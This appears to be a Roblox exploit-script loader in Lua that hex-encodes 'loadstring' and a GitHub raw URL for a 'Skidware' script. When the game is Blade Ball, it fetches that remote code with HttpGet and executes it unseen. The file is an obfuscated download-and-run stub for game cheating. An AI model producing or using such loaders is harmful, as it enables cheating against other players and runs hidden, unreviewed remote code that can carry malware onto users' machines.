local a = { ["\x6C\x6F\x61\x64"] = loadstring }
local b = "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x61\x77\x2E\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6F\x6E\x74\x65\x6E\x74\x2E\x63\x6F\x6D\x2F\x73\x6C\x6F\x77\x68\x75\x62\x32\x33\x35\x2F\x53\x6B\x69\x64\x77\x61\x72\x65\x2F\x72\x65\x66\x73\x2F\x68\x65\x61\x64\x73\x2F\x6D\x61\x69\x6E\x2F\x53\x6B\x69\x64\x77\x61\x72\x65"

local placeId = game.PlaceId

if placeId == 6940931915 then
    print("soon") -- Brookhaven
elseif placeId == 13772394625 then
    a["\x6C\x6F\x61\x64"](game:HttpGet(b, true))() -- Blade Ball
end
